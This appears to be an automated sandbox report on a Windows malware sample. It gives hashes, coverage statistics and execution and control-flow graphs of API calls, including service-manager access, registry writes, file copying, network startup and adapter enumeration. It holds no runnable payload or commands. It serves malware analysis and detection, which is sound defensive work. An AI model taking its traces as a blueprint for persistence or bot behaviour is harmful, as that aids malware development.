                                                                              • Opcode Fuzzy Hash: 6f2b27bda8ca5cc9560dd93be1cc0b104f7b92667656e0278d509a2706482566
                                                                              • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                              Execution Graph

                                                                              Execution Coverage:2.4%
                                                                              Dynamic/Decrypted Code Coverage:66.4%
                                                                              Signature Coverage:19.4%
                                                                              Total number of Nodes:494
                                                                              Total number of Limit Nodes:26
                                                                              execution_graph 61416 9d1c1c CloseHandle 61417 9d1c2a 61416->61417 61418 a2cfa0 61419 a30ed3 CreateFileA 61418->61419 61420 40b185 61421 40b650 61420->61421 61424 9a2abf 61421->61424 61425 9a2ac8 61424->61425 61426 9a2acd 61424->61426 61438 9aa691 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 61425->61438 61430 9a2ae2 61426->61430 61429 40b652 61431 9a2aee __alloc_osfhnd 61430->61431 61432 9a2b99 __alloc_osfhnd 61431->61432 61436 9a2b3c ___DllMainCRTStartup 61431->61436 61439 9a294d 61431->61439 61432->61429 61434 9a2b76 61434->61432 61435 9a294d __CRT_INIT@12 138 API calls 61434->61435 61435->61432 61436->61432 61436->61434 61437 9a294d __CRT_INIT@12 138 API calls 61436->61437 61437->61434 61438->61426 61440 9a2959 __alloc_osfhnd 61439->61440 61441 9a29db 61440->61441 61442 9a2961 61440->61442 61444 9a29df 61441->61444 61445 9a2a44 61441->61445 61487 9a6f96 GetProcessHeap 61442->61487 61449 9a2a00 61444->61449 61479 9a296a __alloc_osfhnd __CRT_INIT@12 61444->61479 61576 9a720b 59 API calls _doexit 61444->61576 61447 9a2a49 61445->61447 61448 9a2aa7 61445->61448 61446 9a2966 61446->61479 61488 9a4b44 61446->61488 61581 9a7f7b 61447->61581 61448->61479 61607 9a49d4 59 API calls 2 library calls 61448->61607 61577 9a70e2 61 API calls _free 61449->61577 61454 9a2a54 61454->61479 61584 9a781c 61454->61584 61456 9a2a05 61458 9a2a16 __CRT_INIT@12 61456->61458 61578 9aa32f 60 API calls _free 61456->61578 61457 9a2976 __RTC_Initialize 61464 9a2986 GetCommandLineA 61457->61464 61457->61479 61580 9a2a2f 62 API calls __mtterm 61458->61580 61463 9a2a11 61579 9a4bba 62 API calls 2 library calls 61463->61579 61509 9aa72d GetEnvironmentStringsW 61464->61509 61468 9a2a7d 61470 9a2a9b 61468->61470 61471 9a2a83 61468->61471 61601 9a1d24 61470->61601 61591 9a4a91 61471->61591 61475 9a29a0 61484 9a29a4 61475->61484 61541 9aa381 61475->61541 61476 9a2a8b GetCurrentThreadId 61476->61479 61479->61436 61574 9a4bba 62 API calls 2 library calls 61484->61574 61486 9a29c4 61486->61479 61575 9aa32f 60 API calls _free 61486->61575 61487->61446 61608 9a72b2 36 API calls 2 library calls 61488->61608 61490 9a4b49 61609 9a77ce InitializeCriticalSectionAndSpinCount __alloc_osfhnd 61490->61609 61492 9a4b4e 61493 9a4b52 61492->61493 61611 9a7f3e TlsAlloc 61492->61611 61610 9a4bba 62 API calls 2 library calls 61493->61610 61496 9a4b57 61496->61457 61497 9a4b64 61497->61493 61498 9a4b6f 61497->61498 61499 9a781c __calloc_crt 59 API calls 61498->61499 61500 9a4b7c 61499->61500 61501 9a4bb1 61500->61501 61612 9a7f9a TlsSetValue 61500->61612 61613 9a4bba 62 API calls 2 library calls 61501->61613 61504 9a4b90 61504->61501 61506 9a4b96 61504->61506 61505 9a4bb6 61505->61457 61507 9a4a91 __initptd 59 API calls 61506->61507 61508 9a4b9e GetCurrentThreadId 61507->61508 61508->61457 61510 9aa740 WideCharToMultiByte 61509->61510 61511 9a2996 61509->61511 61513 9aa7aa FreeEnvironmentStringsW 61510->61513 61514 9aa773 61510->61514 61522 9aa07b 61511->61522 61513->61511 61614 9a7864 59 API calls 2 library calls 61514->61614 61516 9aa779 61516->61513 61517 9aa780 WideCharToMultiByte 61516->61517 61518 9aa79f FreeEnvironmentStringsW 61517->61518 61519 9aa796 61517->61519 61518->61511 61520 9a1d24 _free 59 API calls 61519->61520 61521 9aa79c 61520->61521 61521->61518 61523 9aa087 __alloc_osfhnd 61522->61523 61615 9a769d 61523->61615 61525 9aa08e 61526 9a781c __calloc_crt 59 API calls 61525->61526 61528 9aa09f 61526->61528 61527 9aa10a GetStartupInfoW 61535 9aa11f 61527->61535 61538 9aa24e 61527->61538 61528->61527 61529 9aa0aa __alloc_osfhnd @_EH4_CallFilterFunc@8 61528->61529 61529->61475 61530 9aa316 61624 9aa326 RtlLeaveCriticalSection _doexit 61530->61624 61532 9a781c __calloc_crt 59 API calls 61532->61535 61533 9aa29b GetStdHandle 61533->61538 61534 9aa2ae GetFileType 61534->61538 61535->61532 61536 9aa16d 61535->61536 61535->61538 61537 9aa1a1 GetFileType 61536->61537 61536->61538 61622 9a7fbc InitializeCriticalSectionAndSpinCount 61536->61622 61537->61536 61538->61530 61538->61533 61538->61534 61623 9a7fbc InitializeCriticalSectionAndSpinCount 61538->61623 61542 9aa38f 61541->61542 61543 9aa394 GetModuleFileNameA 61541->61543 61633 9a403a 71 API calls __setmbcp 61542->61633 61544 9aa3c1 61543->61544 61627 9aa434 61544->61627 61547 9a29b0 61547->61486 61552 9aa5b0 61547->61552 61550 9aa3fa 61550->61547 61551 9aa434 _parse_cmdline 59 API calls 61550->61551 61551->61547 61553 9aa5b9 61552->61553 61554 9aa5be _strlen 61552->61554 61637 9a403a 71 API calls __setmbcp 61553->61637 61556 9a781c __calloc_crt 59 API calls 61554->61556 61559 9a29b9 61554->61559 61564 9aa5f4 _strlen 61556->61564 61557 9aa646 61558 9a1d24 _free 59 API calls 61557->61558 61558->61559 61559->61486 61568 9a721a 61559->61568 61560 9a781c __calloc_crt 59 API calls 61560->61564 61561 9aa66d 61563 9a1d24 _free 59 API calls 61561->61563 61563->61559 61564->61557 61564->61559 61564->61560 61564->61561 61565 9aa684 61564->61565 61638 9a5a6c 59 API calls __openfile 61564->61638 61639 9a3cb5 8 API calls 2 library calls 61565->61639 61567 9aa690 61569 9a7226 __IsNonwritableInCurrentImage 61568->61569 61640 9ac08f 61569->61640 61571 9a7244 __initterm_e 61573 9a7263 __cinit __IsNonwritableInCurrentImage 61571->61573 61643 9a2154 61571->61643 61573->61486 61574->61479 61575->61484 61576->61449 61577->61456 61578->61463 61579->61458 61580->61479 61582 9a7f8e 61581->61582 61583 9a7f92 TlsGetValue 61581->61583 61582->61454 61583->61454 61586 9a7823 61584->61586 61587 9a2a65 61586->61587 61589 9a7841 61586->61589 61678 9af268 61586->61678 61587->61479 61590 9a7f9a TlsSetValue 61587->61590 61589->61586 61589->61587 61686 9a82b5 Sleep 61589->61686 61590->61468 61592 9a4a9d __alloc_osfhnd 61591->61592 61593 9a769d __lock 59 API calls 61592->61593 61594 9a4ada 61593->61594 61689 9a4b32 61594->61689 61597 9a769d __lock 59 API calls 61598 9a4afb ___addlocaleref 61597->61598 61692 9a4b3b 61598->61692 61600 9a4b26 __alloc_osfhnd 61600->61476 61602 9a1d56 _free 61601->61602 61603 9a1d2d HeapFree 61601->61603 61602->61479 61603->61602 61604 9a1d42 61603->61604 61697 9a4c0b 59 API calls __getptd_noexit 61604->61697 61606 9a1d48 GetLastError 61606->61602 61607->61479 61608->61490 61609->61492 61610->61496 61611->61497 61612->61504 61613->61505 61614->61516 61616 9a76ae 61615->61616 61617 9a76c1 RtlEnterCriticalSection 61615->61617 61625 9a7725 59 API calls 8 library calls 61616->61625 61617->61525 61619 9a76b4 61619->61617 61626 9a71ef 59 API calls 3 library calls 61619->61626 61622->61536 61623->61538 61624->61529 61625->61619 61629 9aa456 61627->61629 61632 9aa4ba 61629->61632 61635 9b0386 59 API calls x_ismbbtype_l 61629->61635 61630 9aa3d7 61630->61547 61634 9a7864 59 API calls 2 library calls 61630->61634 61632->61630 61636 9b0386 59 API calls x_ismbbtype_l 61632->61636 61633->61543 61634->61550 61635->61629 61636->61632 61637->61554 61638->61564 61639->61567 61641 9ac092 RtlEncodePointer 61640->61641 61641->61641 61642 9ac0ac 61641->61642 61642->61571 61646 9a2058 61643->61646 61645 9a215f 61645->61573 61647 9a2064 __alloc_osfhnd 61646->61647 61654 9a7342 61647->61654 61653 9a208b __alloc_osfhnd 61653->61645 61655 9a769d __lock 59 API calls 61654->61655 61656 9a206d 61655->61656 61657 9a209c RtlDecodePointer RtlDecodePointer 61656->61657 61658 9a2079 61657->61658 61659 9a20c9 61657->61659 61668 9a2096 61658->61668 61659->61658 61671 9a7f0d 60 API calls __openfile 61659->61671 61661 9a212c RtlEncodePointer RtlEncodePointer 61661->61658 61662 9a20db 61662->61661 61663 9a2100 61662->61663 61672 9a78ab 62 API calls 2 library calls 61662->61672 61663->61658 61666 9a211a RtlEncodePointer 61663->61666 61673 9a78ab 62 API calls 2 library calls 61663->61673 61666->61661 61667 9a2114 61667->61658 61667->61666 61674 9a734b 61668->61674 61671->61662 61672->61663 61673->61667 61677 9a7807 RtlLeaveCriticalSection 61674->61677 61676 9a209b 61676->61653 61677->61676 61679 9af273 61678->61679 61684 9af28e 61678->61684 61680 9af27f 61679->61680 61679->61684 61687 9a4c0b 59 API calls __getptd_noexit 61680->61687 61682 9af29e RtlAllocateHeap 61683 9af284 61682->61683 61682->61684 61683->61586 61684->61682 61684->61683 61688 9a6fb3 RtlDecodePointer 61684->61688 61686->61589 61687->61683 61688->61684 61695 9a7807 RtlLeaveCriticalSection 61689->61695 61691 9a4af4 61691->61597 61696 9a7807 RtlLeaveCriticalSection 61692->61696 61694 9a4b42 61694->61600 61695->61691 61696->61694 61697->61606 61698 a2b4a5 DeleteFileA 61699 402148 RegQueryValueExA 61700 40b577 61699->61700 61701 9e1cd7 CreateFileA 61702 a14d76 61701->61702 61703 99e652 CreateFileA 61704 99e74e 61703->61704 61705 99e683 61703->61705 61706 99e69b DeviceIoControl 61705->61706 61707 99e744 CloseHandle 61705->61707 61708 99e710 GetLastError 61705->61708 61710 9a28fc 61705->61710 61706->61705 61707->61704 61708->61705 61708->61707 61713 9a2904 61710->61713 61712 9a291e 61712->61705 61713->61712 61715 9a2922 std::exception::exception 61713->61715 61718 9a1d5c 61713->61718 61735 9a6fb3 RtlDecodePointer 61713->61735 61736 9a330a RaiseException 61715->61736 61717 9a294c 61719 9a1dd7 61718->61719 61731 9a1d68 61718->61731 61743 9a6fb3 RtlDecodePointer 61719->61743 61721 9a1d73 61721->61731 61737 9a7483 59 API calls 2 library calls 61721->61737 61738 9a74e0 59 API calls 8 library calls 61721->61738 61739 9a70cc GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 61721->61739 61722 9a1ddd 61744 9a4c0b 59 API calls __getptd_noexit 61722->61744 61725 9a1d9b RtlAllocateHeap 61725->61731 61734 9a1dcf 61725->61734 61727 9a1dc3 61741 9a4c0b 59 API calls __getptd_noexit 61727->61741 61731->61721 61731->61725 61731->61727 61732 9a1dc1 61731->61732 61740 9a6fb3 RtlDecodePointer 61731->61740 61742 9a4c0b 59 API calls __getptd_noexit 61732->61742 61734->61713 61735->61713 61736->61717 61737->61721 61738->61721 61740->61731 61741->61732 61742->61734 61743->61722 61744->61734 61745 9e1892 61746 9e1817 CreateFileA 61745->61746 61748 a304e4 61746->61748 61748->61748 61749 40b28c VirtualAlloc 61750 40b903 61749->61750 61751 99e756 LoadLibraryA 61752 99e839 61751->61752 61753 99e77f GetProcAddress 61751->61753 61754 99e832 FreeLibrary 61753->61754 61756 99e793 61753->61756 61754->61752 61755 99e7a5 GetAdaptersInfo 61755->61756 61756->61755 61757 99e82d 61756->61757 61758 9a28fc _Allocate 60 API calls 61756->61758 61757->61754 61758->61756 61759 402f50 GetVersion 61783 403be0 HeapCreate 61759->61783 61761 402faf 61762 402fb4 61761->61762 61763 402fbc 61761->61763 61858 40306b 8 API calls 61762->61858 61795 4038c0 61763->61795 61766 402fc4 GetCommandLineA 61809 40378e 61766->61809 61771 402fde 61841 403488 61771->61841 61773 402fe3 61774 402fe8 GetStartupInfoA 61773->61774 61854 403430 61774->61854 61776 402ffa GetModuleHandleA 61778 40301e 61776->61778 61859 4031d7 GetCurrentProcess TerminateProcess ExitProcess 61778->61859 61780 403027 61860 4032ac UnhandledExceptionFilter 61780->61860 61782 403038 61784 403c00 61783->61784 61785 403c36 61783->61785 61861 403a98 19 API calls 61784->61861 61785->61761 61787 403c05 61788 403c1c 61787->61788 61789 403c0f 61787->61789 61791 403c39 61788->61791 61863 404808 HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61788->61863 61862 403fb7 HeapAlloc 61789->61862 61791->61761 61793 403c19 61793->61791 61794 403c2a HeapDestroy 61793->61794 61794->61785 61864 40308f 61795->61864 61798 4038df GetStartupInfoA 61801 40392b 61798->61801 61807 4039f0 61798->61807 61802 40399c 61801->61802 61806 40308f 12 API calls 61801->61806 61801->61807 61802->61807 61808 4039be GetFileType 61802->61808 61803 403a57 SetHandleCount 61803->61766 61804 403a17 GetStdHandle 61805 403a25 GetFileType 61804->61805 61804->61807 61805->61807 61806->61801 61807->61803 61807->61804 61808->61802 61810 4037a9 GetEnvironmentStringsW 61809->61810 61811 4037dc 61809->61811 61812 4037b1 61810->61812 61813 4037bd GetEnvironmentStrings 61810->61813 61811->61812 61814 4037cd 61811->61814 61816 4037f5 WideCharToMultiByte 61812->61816 61817 4037e9 GetEnvironmentStringsW 61812->61817 61813->61814 61815 402fd4 61813->61815 61814->61815 61818 40386f GetEnvironmentStrings 61814->61818 61822 40387b 61814->61822 61832 403541 61815->61832 61820 403829 61816->61820 61821 40385b FreeEnvironmentStringsW 61816->61821 61817->61815 61817->61816 61818->61815 61818->61822 61824 40308f 12 API calls 61820->61824 61821->61815 61823 40308f 12 API calls 61822->61823 61830 403896 61823->61830 61825 40382f 61824->61825 61825->61821 61826 403838 WideCharToMultiByte 61825->61826 61827 403852 61826->61827 61828 403849 61826->61828 61827->61821 61873 403141 61828->61873 61829 4038ac FreeEnvironmentStringsA 61829->61815 61830->61829 61833 403553 61832->61833 61834 403558 GetModuleFileNameA 61832->61834 61886 405232 19 API calls 61833->61886 61836 40357b 61834->61836 61837 40308f 12 API calls 61836->61837 61838 40359c 61837->61838 61839 4035ac 61838->61839 61887 403046 7 API calls 61838->61887 61839->61771 61842 403495 61841->61842 61844 40349a 61841->61844 61888 405232 19 API calls 61842->61888 61845 40308f 12 API calls 61844->61845 61846 4034c7 61845->61846 61847 4034db 61846->61847 61889 403046 7 API calls 61846->61889 61851 40351e 61847->61851 61852 40308f 12 API calls 61847->61852 61890 403046 7 API calls 61847->61890 61849 403141 7 API calls 61850 40352a 61849->61850 61850->61773 61851->61849 61852->61847 61855 403439 61854->61855 61857 40343e 61854->61857 61891 405232 19 API calls 61855->61891 61857->61776 61859->61780 61860->61782 61861->61787 61862->61793 61863->61793 61868 4030a1 61864->61868 61867 403046 7 API calls 61867->61798 61870 40309e 61868->61870 61871 4030a8 61868->61871 61870->61798 61870->61867 61871->61870 61872 4030cd 12 API calls 61871->61872 61872->61871 61874 403169 61873->61874 61875 40314d 61873->61875 61874->61827 61876 403157 61875->61876 61877 40316d 61875->61877 61879 403199 HeapFree 61876->61879 61880 403163 61876->61880 61878 403198 61877->61878 61882 403187 61877->61882 61878->61879 61879->61874 61884 40402a VirtualFree VirtualFree HeapFree 61880->61884 61885 404abb VirtualFree HeapFree VirtualFree 61882->61885 61884->61874 61885->61874 61886->61834 61887->61839 61888->61844 61889->61847 61890->61847 61891->61857 61892 402210 61893 402233 OpenSCManagerA 61892->61893 61895 4029d2 61896 40b20a RegCreateKeyExA 61895->61896 61897 40b49d 61896->61897 61898 99104d 61899 9a2154 __cinit 68 API calls 61898->61899 61900 991057 61899->61900 61903 991aa9 InterlockedIncrement 61900->61903 61904 99105c 61903->61904 61905 991ac5 WSAStartup InterlockedExchange 61903->61905 61905->61904 61906 402997 61907 40b5b6 CopyFileA 61906->61907 61908 40b5bc 61907->61908 61908->61908 61909 402658 GetLocalTime 61912 401f27 61909->61912 61913 401f3c 61912->61913 61916 401a1d 61913->61916 61915 401f45 61917 401a2c 61916->61917 61922 401a4f CreateFileA 61917->61922 61921 401a3e 61921->61915 61923 401a35 61922->61923 61926 401a7d 61922->61926 61930 401b4b LoadLibraryA 61923->61930 61924 401a98 DeviceIoControl 61924->61926 61926->61924 61927 401b3a CloseHandle 61926->61927 61928 401b0e GetLastError 61926->61928 61939 402d96 7 API calls 61926->61939 61940 402d88 12 API calls 61926->61940 61927->61923 61928->61926 61928->61927 61931 401c21 61930->61931 61932 401b6e GetProcAddress 61930->61932 61931->61921 61933 401c18 FreeLibrary 61932->61933 61936 401b85 61932->61936 61933->61931 61934 401b95 GetAdaptersInfo 61934->61936 61936->61934 61937 401c15 61936->61937 61941 402d96 7 API calls 61936->61941 61942 402d88 12 API calls 61936->61942 61937->61933 61939->61926 61940->61926 61941->61936 61942->61936 61943 40ba59 lstrcmpiW 61944 40234d 61943->61944 61945 40275c LoadLibraryExA 61946 40216a 61945->61946 61947 4027df 61948 4028e1 61947->61948 61949 40b56a CopyFileA 61947->61949 61949->61948 61950 4022a1 RegCloseKey 61951 40b327 61950->61951 61952 4025e4 Sleep 61953 40b0aa 61952->61953 61954 a29887 61955 a30ef9 Sleep 61954->61955 61956 40b127 61957 40b4a8 61956->61957 61958 4026bd 61957->61958 61961 40bc2e Sleep 61957->61961 61962 401f64 FindResourceA 61958->61962 61960 40bc4a 61961->61958 61963 401f86 GetLastError SizeofResource 61962->61963 61964 401f9f 61962->61964 61963->61964 61965 401fa6 LoadResource LockResource GlobalAlloc 61963->61965 61964->61960 61966 401fd2 61965->61966 61967 401ffb GetTickCount 61966->61967 61969 402005 GlobalAlloc 61967->61969 61969->61964 61970 402968 RegSetValueExA 61971 40baff RegCloseKey 61970->61971 61972 40bb05 61971->61972 61972->61972 61973 995c76 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 61974 995ce3 GetTickCount 61973->61974 62044 9942c7 61973->62044 62045 9958d7 61974->62045 61977 995d00 GetVersionExA 61978 995d41 _memset 61977->61978 61979 9a1d5c _malloc 59 API calls 61978->61979 61980 995d4e 61979->61980 61981 9a1d5c _malloc 59 API calls 61980->61981 61982 995d5e 61981->61982 61983 9a1d5c _malloc 59 API calls 61982->61983 61984 995d69 61983->61984 61985 9a1d5c _malloc 59 API calls 61984->61985 61986 995d74 61985->61986 61987 9a1d5c _malloc 59 API calls 61986->61987 61988 995d7f 61987->61988 61989 9a1d5c _malloc 59 API calls 61988->61989 61990 995d8a 61989->61990 61991 9a1d5c _malloc 59 API calls 61990->61991 61992 995d95 61991->61992 61993 9a1d5c _malloc 59 API calls 61992->61993 61994 995da1 6 API calls 61993->61994 61995 995dee _memset 61994->61995 61996 995e07 RtlEnterCriticalSection RtlLeaveCriticalSection 61995->61996 61997 9a1d5c _malloc 59 API calls 61996->61997 61998 995e43 61997->61998 61999 9a1d5c _malloc 59 API calls 61998->61999 62000 995e51 61999->62000 62001 9a1d5c _malloc 59 API calls 62000->62001 62002 995e58 62001->62002 62003 9a1d5c _malloc 59 API calls 62002->62003 62004 995e79 QueryPerformanceCounter Sleep 62003->62004 62005 9a1d5c _malloc 59 API calls 62004->62005 62006 995e9f 62005->62006 62007 9a1d5c _malloc 59 API calls 62006->62007 62036 995eaf _memset 62007->62036 62008 995f1c Sleep 62009 995f22 RtlEnterCriticalSection RtlLeaveCriticalSection 62008->62009 62009->62036 62010 9962b8 RtlEnterCriticalSection RtlLeaveCriticalSection 62011 9a10ec 66 API calls 62010->62011 62011->62036 62012 9a1d5c _malloc 59 API calls 62013 99635a RtlEnterCriticalSection RtlLeaveCriticalSection 62012->62013 62013->62036 62014 996613 RtlEnterCriticalSection RtlLeaveCriticalSection 62014->62036 62015 995a29 59 API calls 62015->62036 62016 9a10ec 66 API calls 62016->62036 62017 9a11c8 _sprintf 84 API calls 62017->62036 62018 991ba7 210 API calls 62018->62036 62019 996777 RtlEnterCriticalSection 62020 9967a4 RtlLeaveCriticalSection 62019->62020 62019->62036 62024 993c67 72 API calls 62020->62024 62021 99534d 93 API calls 62021->62036 62022 9a1d24 59 API calls _free 62022->62036 62023 9a1d5c 59 API calls _malloc 62023->62036 62024->62036 62025 993d7e 64 API calls 62025->62036 62026 9970ea 89 API calls 62026->62036 62027 9a2396 60 API calls _strtok 62027->62036 62028 9994d4 73 API calls 62028->62036 62029 997db2 88 API calls 62029->62036 62030 997199 71 API calls 62030->62036 62031 9a28fc _Allocate 60 API calls 62031->62036 62032 9a1600 _swscanf 59 API calls 62032->62036 62033 9933b2 86 API calls 62033->62036 62034 9984e6 212 API calls 62034->62036 62035 9995fe 60 API calls 62035->62036 62036->62008 62036->62009 62036->62010 62036->62012 62036->62014 62036->62015 62036->62016 62036->62017 62036->62018 62036->62019 62036->62020 62036->62021 62036->62022 62036->62023 62036->62025 62036->62026 62036->62027 62036->62028 62036->62029 62036->62030 62036->62031 62036->62032 62036->62033 62036->62034 62036->62035 62036->62036 62037 995119 103 API calls 62036->62037 62038 99bec6 73 API calls 62036->62038 62039 9999be 210 API calls 62036->62039 62040 996590 Sleep 62036->62040 62042 99658b shared_ptr 62036->62042 62037->62036 62038->62036 62039->62036 62041 9a06a0 GetProcessHeap HeapFree 62040->62041 62041->62042 62042->62036 62042->62040 62043 994100 GetProcessHeap HeapFree 62042->62043 62043->62042 62046 9a1d5c _malloc 59 API calls 62045->62046 62047 9958ea 62046->62047 62048 40b170 lstrcmpiW

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 288 995c76-995cdc RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 289 995ce3-995f04 GetTickCount call 9958d7 GetVersionExA call 9a38a0 call 9a1d5c * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 9a38a0 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a1d5c * 4 QueryPerformanceCounter Sleep call 9a1d5c * 2 call 9a38a0 * 2 288->289 290 995cde call 9942c7 288->290 333 995f08-995f0a 289->333 290->289 334 995f0c-995f11 333->334 335 995f13-995f15 333->335 336 995f1c Sleep 334->336 337 995f22-995f51 RtlEnterCriticalSection RtlLeaveCriticalSection 335->337 338 995f17 335->338 336->337 339 996029-996035 337->339 338->336 340 996048 339->340 341 99604a-996052 340->341 342 9960c4-9960cb 340->342 341->339 344 996054-99607e 341->344 343 9960cc-9960cf 342->343 345 9960d1-9960ed 343->345 346 9960c3 343->346 344->340 350 996090-996094 344->350 348 9960ab 345->348 349 9960ef-9960f0 345->349 346->342 354 9960b0-9960bd 348->354 351 9960f3-99610c 349->351 352 9960a3-9960a9 350->352 353 996096 350->353 355 99610e 351->355 356 9960c0-9960c2 351->356 352->348 353->354 354->350 357 9960bf 354->357 358 996151-996193 355->358 359 996110-996130 355->359 356->346 356->351 357->343 357->356 361 996194-99619f 358->361 360 996145-99614e 359->360 362 996150 360->362 363 9961a1-9961a4 361->363 364 9961e0-9961e5 361->364 362->358 363->360 367 9961a6 363->367 365 996212-996217 364->365 366 9961e6-9961ec 364->366 370 996218-996228 365->370 371 9961a7-9961c1 365->371 368 99622f-996233 366->368 369 9961ee 366->369 367->362 367->371 372 9961f0-9961f6 368->372 373 996235-996236 368->373 369->372 374 9961cb-9961dc 370->374 380 99622b 370->380 371->374 375 9961f7-9961fb 372->375 377 996238-99623b 373->377 378 9962aa-9962b2 call 99439c 373->378 374->364 375->361 379 9961fd-9961ff 375->379 377->375 382 99623d-996256 377->382 378->333 388 9962b8-9962e3 RtlEnterCriticalSection RtlLeaveCriticalSection call 9a10ec 378->388 383 996258-996262 379->383 384 996201-99620e 379->384 380->368 382->383 386 99627e-996288 383->386 387 996264-99626a 383->387 384->365 386->333 391 99628e-9962a9 call 9a38a0 386->391 389 99626c-99626e 387->389 390 996270-99627d call 9953ec 387->390 398 99632d-996345 call 9a10ec 388->398 399 9962e5-9962f4 call 9a10ec 388->399 389->386 390->386 391->378 405 99634b-99634d 398->405 406 9965ee-9965fd call 9a10ec 398->406 399->398 404 9962f6-996305 call 9a10ec 399->404 404->398 416 996307-996316 call 9a10ec 404->416 405->406 409 996353-9963fe call 9a1d5c RtlEnterCriticalSection RtlLeaveCriticalSection call 9a38a0 * 5 call 99439c * 2 405->409 413 9965ff-996601 406->413 414 996642-996651 call 9a10ec 406->414 467 99643b 409->467 468 996400-996402 409->468 413->414 417 996603-99663d call 9a38a0 RtlEnterCriticalSection RtlLeaveCriticalSection 413->417 427 996653 call 995a29 414->427 428 996666-996675 call 9a10ec 414->428 416->398 429 996318-996327 call 9a10ec 416->429 417->333 435 996658-996661 call 995b37 427->435 440 99667b-99667d 428->440 441 99698c-99699b call 9a10ec 428->441 429->333 429->398 435->333 440->441 442 996683-99669c call 99439c 440->442 441->333 451 9969a1-9969cd call 9a1d5c call 9a38a0 call 99439c 441->451 442->333 452 9966a2-996770 call 9a11c8 call 991ba7 442->452 473 9969cf-9969d1 call 99534d 451->473 474 9969d6-9969dd call 9a1d24 451->474 470 996772 call 99143f 452->470 471 996777-996798 RtlEnterCriticalSection 452->471 475 99643f-99646d call 9a1d5c call 9a38a0 call 99439c 467->475 468->467 472 996404-996416 call 9a10ec 468->472 470->471 477 99679a-9967a1 471->477 478 9967a4-99680b RtlLeaveCriticalSection call 993c67 call 993d7e call 9970ea 471->478 472->467 488 996418-996439 call 99439c 472->488 473->474 474->333 501 99646f-99647e call 9a2396 475->501 502 9964ae-9964b7 call 9a1d24 475->502 477->478 499 996811-996853 call 9994d4 478->499 500 996973-996987 call 997db2 478->500 488->475 512 996859-996860 499->512 513 99693d-99696e call 997199 call 9933b2 499->513 500->333 501->502 511 996480 501->511 514 9964bd-9964d5 call 9a28fc 502->514 515 9965dc-9965e9 502->515 516 996485-996497 call 9a1600 511->516 518 996863-996868 512->518 513->500 524 9964e1 514->524 525 9964d7-9964df call 9984e6 514->525 515->333 531 996499 516->531 532 99649c-9964ac call 9a2396 516->532 518->518 522 99686a-9968af call 9994d4 518->522 522->513 537 9968b5-9968bb 522->537 530 9964e3-996573 call 9995fe call 993863 call 995119 call 993863 call 9998a4 call 9999be 524->530 525->530 556 996578-996589 530->556 531->532 532->502 532->516 540 9968be-9968c3 537->540 540->540 542 9968c5-996900 call 9994d4 540->542 542->513 547 996902-99693c call 99bec6 542->547 547->513 557 99658b call 99380b 556->557 558 996590-9965bb Sleep call 9a06a0 556->558 557->558 562 9965bd-9965c6 call 994100 558->562 563 9965c7-9965d5 558->563 562->563 563->515 565 9965d7 call 99380b 563->565 565->515
                                                                              APIs
                                                                              • RtlInitializeCriticalSection.NTDLL(009C5FB8), ref: 00995CAA
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 00995CC1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00995CCA
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 00995CD9
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00995CDC
                                                                              • GetTickCount.KERNEL32 ref: 00995CF0
                                                                                • Part of subcall function 009958D7: _malloc.LIBCMT ref: 009958E5
                                                                              • GetVersionExA.KERNEL32(009C5E10), ref: 00995D1D
                                                                              • _memset.LIBCMT ref: 00995D3C
                                                                              • _malloc.LIBCMT ref: 00995D49
                                                                                • Part of subcall function 009A1D5C: __FF_MSGBANNER.LIBCMT ref: 009A1D73
                                                                                • Part of subcall function 009A1D5C: __NMSG_WRITE.LIBCMT ref: 009A1D7A
                                                                                • Part of subcall function 009A1D5C: RtlAllocateHeap.NTDLL(00B10000,00000000,00000001), ref: 009A1D9F
                                                                              • _malloc.LIBCMT ref: 00995D59
                                                                              • _malloc.LIBCMT ref: 00995D64
                                                                              • _malloc.LIBCMT ref: 00995D6F
                                                                              • _malloc.LIBCMT ref: 00995D7A
                                                                              • _malloc.LIBCMT ref: 00995D85
                                                                              • _malloc.LIBCMT ref: 00995D90
                                                                              • _malloc.LIBCMT ref: 00995D9C
                                                                              • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00995DB3
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DBC
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00995DC8
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DCB
                                                                              • GetProcessHeap.KERNEL32(00000000,00000400), ref: 00995DD6
                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00995DD9
                                                                              • _memset.LIBCMT ref: 00995DE9
                                                                              • _memset.LIBCMT ref: 00995DF5
                                                                              • _memset.LIBCMT ref: 00995E02
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995E10
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995E1D
                                                                              • _malloc.LIBCMT ref: 00995E3E
                                                                              • _malloc.LIBCMT ref: 00995E4C
                                                                              • _malloc.LIBCMT ref: 00995E53
                                                                              • _malloc.LIBCMT ref: 00995E74
                                                                              • QueryPerformanceCounter.KERNEL32(00000200), ref: 00995E80
                                                                              • Sleep.KERNEL32(00000000), ref: 00995E8E
                                                                              • _malloc.LIBCMT ref: 00995E9A
                                                                              • _malloc.LIBCMT ref: 00995EAA
                                                                              • _memset.LIBCMT ref: 00995EBF
                                                                              • _memset.LIBCMT ref: 00995ECF
                                                                              • Sleep.KERNEL32(0000EA60), ref: 00995F1C
                                                                              • RtlEnterCriticalSection.NTDLL(009C5FB8), ref: 00995F27
                                                                              • RtlLeaveCriticalSection.NTDLL(009C5FB8), ref: 00995F38
